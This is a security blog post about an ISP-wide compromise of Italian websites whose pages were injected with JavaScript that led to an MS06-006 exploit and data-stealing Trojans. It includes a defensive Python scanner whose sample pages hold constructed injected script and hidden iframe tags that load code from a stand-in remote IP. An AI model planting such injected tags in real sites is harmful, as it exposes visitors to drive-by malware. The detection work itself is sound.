Another major site compromise (part II)

In the previous part of this post I highlighted the compromise of a large Italian web site. Its pages had been modified (a malicious JavaScript was added) so that they silently loaded content from a remote server. That content was in turn another malicious JavaScript, which exploits the Windows Media Player plugin vulnerability (MS06-006) to download a Win32 downloader Trojan (detection for this is being published as Mal/DownLdr-H).

The downloader itself fetches a configuration file from another remote server; that file contains further URLs to download from. The ultimate payload is a Win32 data-stealing Trojan, proactively detected as Mal/Basine-C.

The good news is that, following the swift reaction of folks at our Italian office, the first compromised site has been cleaned up (kudos to the affected company for acting so quickly). Unfortunately, since then SophosLabs have seen other Italian sites fall victim to the same attack. Digging into the list of sites, it is apparent that all lie in a close IP range; in fact, all are hosted by the same ISP. So in this case it is likely that the attackers managed to gain remote access to the web server(s) at this ISP and compromised the sites hosted there. The web server in question is running Microsoft-IIS/6.0 on Windows Server 2003.
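Two checks are useful when triaging a case like this: scanning the HTML of suspect sites for script or iframe tags that pull content from an off-site host (the injection symptom described above), and grouping the affected hosts by address block to see whether they share a hosting provider. The script below is an added example, not SophosLabs' own tooling; the page contents, host names and IP addresses in it are constructed (documentation ranges), not the real compromised sites, and the "same site" rule (host equals, or is a subdomain of, the page's own registrable domain) is a simplifying assumption.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample pages from three hypothetical hosts (not the real
# compromised sites). Two carry an injected tag pointing at the same
# remote host; the third only loads a script from its own subdomain.
SAMPLE_PAGES = {
    "www.site-a.test": (
        "<html><body><h1>Benvenuti</h1>\n"
        '<script src="/js/menu.js"></script>\n'
        '<script src="http://203.0.113.45/x/load.js"></script>\n'
        "</body></html>"
    ),
    "www.site-b.test": (
        "<html><body><p>Home</p>\n"
        '<iframe src="http://203.0.113.45/x/" width="0" height="0" '
        'style="display:none"></iframe>\n'
        "</body></html>"
    ),
    "www.site-c.test": (
        "<html><body>\n"
        '<script src="//static.site-c.test/app.js"></script>\n'
        "</body></html>"
    ),
}

# Constructed resolution results for the same hosts (documentation ranges),
# standing in for what a DNS lookup of each site would return.
SAMPLE_IPS = {
    "www.site-a.test": "198.51.100.10",
    "www.site-b.test": "198.51.100.11",
    "www.site-c.test": "192.0.2.7",
}

TAG_RE = re.compile(r"<(script|iframe)\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
# Attributes typically used to keep an injected iframe out of sight.
HIDDEN_RE = re.compile(
    r"""(width|height)\s*=\s*["']?0\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.I,
)


def _same_site(host, own_host):
    """Assumption: the last two labels of the page's host are its own domain."""
    base = ".".join(own_host.lower().split(".")[-2:])
    h = host.lower()
    return h == base or h.endswith("." + base)


def find_remote_loads(html, own_host):
    """Return script/iframe tags whose src points off-site, noting hidden ones."""
    findings = []
    for m in TAG_RE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        s = SRC_RE.search(attrs)
        if not s:
            continue
        url = s.group(1)
        host = urlparse(url).hostname
        if host is None or _same_site(host, own_host):
            continue  # relative path or the site's own domain
        findings.append({"tag": tag, "src": url, "host": host,
                         "hidden": bool(HIDDEN_RE.search(attrs))})
    return findings


def scan_pages(pages):
    """Map each host name to the off-site loads found in its page."""
    return {host: find_remote_loads(html, host) for host, html in pages.items()}


def shared_remote_hosts(results):
    """Remote hosts referenced by more than one scanned site: the likely injection source."""
    seen = defaultdict(set)
    for site, findings in results.items():
        for f in findings:
            seen[f["host"]].add(site)
    return {host: sorted(sites) for host, sites in seen.items() if len(sites) > 1}


def group_by_prefix(host_to_ip, prefix_len=24):
    """Group affected hosts by address block to spot a shared hosting provider."""
    groups = defaultdict(list)
    for host, ip in host_to_ip.items():
        net = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
        groups[str(net)].append(host)
    return {net: sorted(hosts) for net, hosts in groups.items()}


if __name__ == "__main__":
    results = scan_pages(SAMPLE_PAGES)
    for site, findings in results.items():
        for f in findings:
            print(site, f)
    print("shared remote hosts:", shared_remote_hosts(results))
    affected = {h: ip for h, ip in SAMPLE_IPS.items() if results[h]}
    print("affected sites by /24:", group_by_prefix(affected))
```

The regexes are deliberately loose: injected tags are often obfuscated, wrapped in `document.write`, or use event handlers rather than a plain `src`, so a clean scan is not proof that a page is untouched. The /24 grouping is only a hint; confirm shared hosting with reverse DNS or WHOIS before concluding that one server serves all the affected sites.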

This scenario illustrates perfectly the consequences of a single web server being compromised by intruders. That server may host many different web sites, so a failure in the security of that one machine can:

  • expose potentially huge numbers of people to malicious threats
  • damage the reputation of the companies/individuals hosting sites there